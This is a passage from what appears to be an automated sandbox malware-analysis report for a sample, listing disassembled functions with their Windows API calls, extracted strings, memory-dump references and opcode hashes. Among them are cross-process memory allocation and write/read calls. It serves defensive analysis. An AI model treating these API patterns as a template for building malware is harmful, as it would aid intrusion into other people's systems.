                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,006382E6), ref: 00638722
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006382E6), ref: 0063872F
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,006382E6), ref: 00638736
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: fa789c148387cbdf1de34d6058d1c80403d9163fe933fb98635e6a00f1a3ab45
                                                      • Instruction ID: 730dd00a546ca6735405a0f5c61ba22c56ed30b04992de1265beb0191f5263ff
                                                      • Opcode Fuzzy Hash: fa789c148387cbdf1de34d6058d1c80403d9163fe933fb98635e6a00f1a3ab45
                                                      • Instruction Fuzzy Hash: 3EE04F36615312ABD7205FB16D0CB9A3BAEEF50791F145828F245DA040DA6488418B90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %g
                                                      • API String ID: 0-3742675072
                                                      • Opcode ID: 07c297df3e3e4cb4d781bace4059aac787b329d371f59c80546578c25ddd6c53
                                                      • Instruction ID: bd86078afb66571fc3166795a06bc1e33e209a4b112145b9acfd8c3b4322515e
                                                      • Opcode Fuzzy Hash: 07c297df3e3e4cb4d781bace4059aac787b329d371f59c80546578c25ddd6c53
                                                      • Instruction Fuzzy Hash: E9B1937580018A9BCF1CEF96C8859FEBFB5FF68390F144426E991A7191EB309E81C791
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __itow_s
                                                      • String ID: xbj$xbj
                                                      • API String ID: 3653519197-1531641965
                                                      • Opcode ID: 3cdc52b2c5009e65da5049f73ce6ea1ee362ee061d3efab5b571be6f911540fe
                                                      • Instruction ID: 82389af43e53d97ec2f287524874c4eacbb0988c750f51d3853edce0cc4a3a04
                                                      • Opcode Fuzzy Hash: 3cdc52b2c5009e65da5049f73ce6ea1ee362ee061d3efab5b571be6f911540fe
                                                      • Instruction Fuzzy Hash: ADB17C70A0014AAFCB24DF55C895EEABBBAFF49301F148159FD459B291EB30E945CB60
                                                      APIs
                                                        • Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • __wcsnicmp.LIBCMT ref: 0064B02D
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0064B0F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: a6b556f175fcddc94a9d2102b2d8871d185271da39aeb88b46bb8cce536d5e26
                                                      • Instruction ID: c128b182d26b202048800d01f16ab51ff69325f82f9394661667d5b00ab3a8cd
                                                      • Opcode Fuzzy Hash: a6b556f175fcddc94a9d2102b2d8871d185271da39aeb88b46bb8cce536d5e26
                                                      • Instruction Fuzzy Hash: 1B618C71A00219AFCB18DF94C895EEEB7B6EF48710F105069F956AB3A1D770EE41CB90
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 005F2968
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 005F2981
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: 45438f9ed025698a71d33aacbe4caf0600b657c47ab29d17bc10ff3d319db39b
                                                      • Instruction ID: f1e8741e802cd14d4b8cfde948f50254cdac1c608954d0028f07d2965217b002
                                                      • Opcode Fuzzy Hash: 45438f9ed025698a71d33aacbe4caf0600b657c47ab29d17bc10ff3d319db39b
                                                      • Instruction Fuzzy Hash: 76513771408785ABD720EF11D88ABABBBECFBC5344F42885DF2D8410A1DF708529CB66
                                                      APIs
                                                        • Part of subcall function 005E4F0B: __fread_nolock.LIBCMT ref: 005E4F29
                                                      • _wcscmp.LIBCMT ref: 00649824
                                                      • _wcscmp.LIBCMT ref: 00649837
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$__fread_nolock
                                                      • String ID: FILE
                                                      • API String ID: 4029003684-3121273764
                                                      • Opcode ID: 3392ca09ed2f3c2eed6b2df7fac94c33eac8f71645ae3a1b9e9a4d4c4e4a4c8f
                                                      • Instruction ID: 29d30e09d226052b139546666da82dabe1c3e06d2fa99c84e8fb289c2418577a
                                                      • Opcode Fuzzy Hash: 3392ca09ed2f3c2eed6b2df7fac94c33eac8f71645ae3a1b9e9a4d4c4e4a4c8f
                                                      • Instruction Fuzzy Hash: 3F41EB31A4021ABADF259FA5CC49FEFBBBEEF86710F000469F904E7280D67199048B65
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID: Ddj$Ddj
                                                      • API String ID: 1473721057-2583336740
                                                      • Opcode ID: 4032f8ebe78fe60d52060771172ccbe094a7c52cfcd9dbddedb576d73faf50b8
                                                      • Instruction ID: d329fe4a609695838eecb4a5973f0d331c867481a075a5a2e5858fdc95af866b
                                                      • Opcode Fuzzy Hash: 4032f8ebe78fe60d52060771172ccbe094a7c52cfcd9dbddedb576d73faf50b8
                                                      • Instruction Fuzzy Hash: CB51C0786083818FD758DF2AC584A1ABBF2BB99354F54885CF9858B361D331EC81CF42
                                                      APIs
                                                      • _memset.LIBCMT ref: 0065259E
                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006525D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CrackInternet_memset
                                                      • String ID: |
                                                      • API String ID: 1413715105-2343686810
                                                      • Opcode ID: 35e3a049d774faf072e5580086979f92264f56c855fc205dc47d4f6197bccdcc
                                                      • Instruction ID: 2b4875ddf22ec6ca6c29a54d36122d5a8c03f7605f093cfce529e70aac30eb81
                                                      • Opcode Fuzzy Hash: 35e3a049d774faf072e5580086979f92264f56c855fc205dc47d4f6197bccdcc
                                                      • Instruction Fuzzy Hash: 3E31167180015AABCF05AFA1CC99EEEBFB9FF09310F100069FD55A6262EB315956DB60
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00667B61
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00667B76
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: ec8fa68e1433eba05918d5af6547048c5615d1f69c1324317a2c0943b5687520
                                                      • Instruction ID: 0cb41763cb863e8d4ab537fb9b54eefcc59c4bb34f9bb41736a0320aa9bfd27f
                                                      • Opcode Fuzzy Hash: ec8fa68e1433eba05918d5af6547048c5615d1f69c1324317a2c0943b5687520
                                                      • Instruction Fuzzy Hash: C8411974A0530A9FDB14CFA4C881BEABBB6FF09304F10016AE905EB395E771A951CF90
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00666B17
                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00666B53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: cc686b51ed01be18f98f3da5c036a52283b22d36df32ced2174bcbda197e0a53
                                                      • Instruction ID: a1260d208e1424ae097cbd6b7c1ab29f49aebf59cd03cd3086d6a4b043e26e58
                                                      • Opcode Fuzzy Hash: cc686b51ed01be18f98f3da5c036a52283b22d36df32ced2174bcbda197e0a53
                                                      • Instruction Fuzzy Hash: 3431AF71200604EEDB109F65DC80BFB77AAFF88760F10961DF9A5D7290DA71AC91CB60
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00639965
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0063999F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3850602802-2594219639
                                                      • Opcode ID: bf8a978f89a3553ba24f02802462b1c76cea1b096313cf6a171fd1313ce4869b
                                                      • Instruction ID: 6b316aa10d6a650fa3b93b06233a6d79f770983e01435d2d6626ab19a3f60396
                                                      • Opcode Fuzzy Hash: bf8a978f89a3553ba24f02802462b1c76cea1b096313cf6a171fd1313ce4869b
                                                      • Instruction Fuzzy Hash: 8A21D732D00209ABCB14EBA5D885DEEBB7AEFC8710F054169F955A7291EAB15C41CBA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00642911
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0064294C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: f71de224fdd9bd85f08e3fe233ef658f966d507fb8563ea39b49ba6b736533ea
                                                      • Instruction ID: dc8ecf72751a08325b63967699787c33e21cc2345357fdd0d88c3d37613e2dd3
                                                      • Opcode Fuzzy Hash: f71de224fdd9bd85f08e3fe233ef658f966d507fb8563ea39b49ba6b736533ea
                                                      • Instruction Fuzzy Hash: 6931D531A00307DFEB28DF5AC895BEEBBB6EF45350F640019F985A62A0D7709D44CB51
                                                      APIs
                                                        • Part of subcall function 005F603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 005F6051
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0063AA10
                                                      • _strlen.LIBCMT ref: 0063AA1B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout_strlen
                                                      • String ID: @U=u
                                                      • API String ID: 2777139624-2594219639
                                                      • Opcode ID: 28a646ded565d8d8d0771c3cd9e20ea03df90e5f364b5a41351d360a12add54b
                                                      • Instruction ID: e2fcc66ba4d02f9fe8170914baa98400c90f324ece12de837543284e2a6070ef
                                                      • Opcode Fuzzy Hash: 28a646ded565d8d8d0771c3cd9e20ea03df90e5f364b5a41351d360a12add54b
                                                      • Instruction Fuzzy Hash: 9411383320010666CB18AEB8DC869FF7B6A9F49300F00102DF585DA2D3DD248845E395
                                                      APIs
                                                        • Part of subcall function 006455FD: GetLocalTime.KERNEL32 ref: 0064560A
                                                        • Part of subcall function 006455FD: _wcsncpy.LIBCMT ref: 0064563F
                                                        • Part of subcall function 006455FD: _wcsncpy.LIBCMT ref: 00645671
                                                        • Part of subcall function 006455FD: _wcsncpy.LIBCMT ref: 006456A4
                                                        • Part of subcall function 006455FD: _wcsncpy.LIBCMT ref: 006456E6
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 006668FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalMessageSendTime
                                                      • String ID: @U=u$SysDateTimePick32
                                                      • API String ID: 2466184910-2530228043
                                                      • Opcode ID: 26a5a7c469e48b90cfc7c8a2881daff09af876b6932cbb1a29a67e30f45324fe
                                                      • Instruction ID: a088ef8e27c6a7fe05666087387ec614a417446ac6eaa063355b6a2b94dc2985
                                                      • Opcode Fuzzy Hash: 26a5a7c469e48b90cfc7c8a2881daff09af876b6932cbb1a29a67e30f45324fe
                                                      • Instruction Fuzzy Hash: 0521B4713402197BEF219E64EC82FEA736BEB44750F204519F951AB2D1D6B1AC918BA0
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0063923E
                                                        • Part of subcall function 006413DE: GetWindowThreadProcessId.USER32(?,?), ref: 00641409
                                                        • Part of subcall function 006413DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0063925A,00000034,?,?,00001004,00000000,00000000), ref: 00641419
                                                        • Part of subcall function 006413DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0063925A,00000034,?,?,00001004,00000000,00000000), ref: 0064142F
                                                        • Part of subcall function 006414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00639296,?,?,00000034,00000800,?,00000034), ref: 006414E6
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 006392A5
                                                        • Part of subcall function 00641487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006414B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @U=u
                                                      • API String ID: 1045663743-2594219639
                                                      • Opcode ID: f44c3f337f62db408c541a676fe3a34ba2dc8da1eae9c2c22a91996cb9bb56ee
                                                      • Instruction ID: 07e9bdbf7d7e1b4680543a722ae10020c08bd0efa489af1374e422a7e484deb9
                                                      • Opcode Fuzzy Hash: f44c3f337f62db408c541a676fe3a34ba2dc8da1eae9c2c22a91996cb9bb56ee
                                                      • Instruction Fuzzy Hash: D0216031901119BBEF51DBA4DC85FDEBBB9FF09310F1001A9F558A71A0DAB05A84CFA4
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00666761
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0066676C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: 887f8a3e3dcf483fdc71f0eae99b878d519c3a6ed228d7cf6382c7859a5c2516
                                                      • Instruction ID: 0975570b2d61574bb431464960834f20040429660e23fa9093c53b253fb68630
                                                      • Opcode Fuzzy Hash: 887f8a3e3dcf483fdc71f0eae99b878d519c3a6ed228d7cf6382c7859a5c2516
                                                      • Instruction Fuzzy Hash: 2C119071200208BFEF119F54EC80EEB3B6BEB88368F110129F91497290D6719C5187A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @U=u
                                                      • API String ID: 0-2594219639
                                                      • Opcode ID: f29f87468c255eb9a0e86419e66fc635917238ed62bf6e483396739c7212b1db
                                                      • Instruction ID: c4db273ede10af685433941f790835000884f1fd64edb9f670bf50ab2be21a4c
                                                      • Opcode Fuzzy Hash: f29f87468c255eb9a0e86419e66fc635917238ed62bf6e483396739c7212b1db
                                                      • Instruction Fuzzy Hash: B8216D35124118BFEB109F54CC45FFA3BAAEB0A310F404165FE52DA2E0D671EA11DB70
                                                      APIs
                                                        • Part of subcall function 005E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005E1D73
                                                        • Part of subcall function 005E1D35: GetStockObject.GDI32(00000011), ref: 005E1D87
                                                        • Part of subcall function 005E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 005E1D91
                                                      • GetWindowRect.USER32(00000000,?), ref: 00666C71
                                                      • GetSysColor.USER32(00000012), ref: 00666C8B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
